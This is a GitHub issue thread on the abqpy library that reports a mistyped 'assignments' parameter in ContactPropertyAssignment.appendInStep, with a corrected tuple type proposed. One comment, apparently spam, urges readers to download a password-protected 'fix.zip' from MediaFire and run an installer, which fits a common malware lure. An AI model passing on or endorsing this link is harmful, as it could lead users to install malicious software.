### ISSUE TITLE
`ContactPropertyAssignment.appendInStep`'s `assignments` argument is mistyped

### ISSUE THREAD

**Issue by sebastianvitterso** [haiiliin/abqpy#5733]
**Describe the bug**
From [ContactPropertyAssignment.py:44](https://github.com/haiiliin/abqpy/blob/6fe31a0c5d6b98bc201d224d08812fe7f5ee4560/src/abaqus/Interaction/ContactPropertyAssignment.py#L44): 
```py
    @abaqus_method_doc
    def appendInStep(self, stepName: str, assignments: Literal[C.SELF, C.GLOBAL]):
        """This method allows addition of contact property assignments to new domain pairs in a given step.

        Parameters
        ----------
        stepName
            A String specifying the name of the step in which new contact property assignments are
            to be defined.
        assignments
            A sequence of tuples specifying the properties assigned to each surface pair. Each tuple
            contains three entries:

            - A region or a material object or the SymbolicConstant GLOBAL.
            - A region or a material object or the SymbolicConstant SELF. When used with a ContactExp
              object, this parameter can also be a string that references an Eulerian material
              surface.
            - A String specifying a ContactProperty object associated with this pair of
              regions.

            .. versionchanged:: 2021
                Update descriptions of the three entries in the tuple.
        """
        ...
```

Abaqus Scripting Reference 2024 states, just like the docstring, that `assignments` should hold a sequence of tuples of length 3:
![image](https://github.com/user-attachments/assets/8a9a6ea4-8ae8-4772-9aa9-d2e643296233)

So the `assignments: Literal` typing is not correct, it should probably be something like:
```py
assignments: tuple[tuple[Region | Material | GLOBAL, Region | Material | SELF, ContactProperty], ...]
```
But I'm not entirely sure.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haiiliin** [comment]
I think it should be `tuple[tuple[Region | Material | Literal[C.GLOBAL], Region | Material | Literal[C.SELF], str], ...]`.
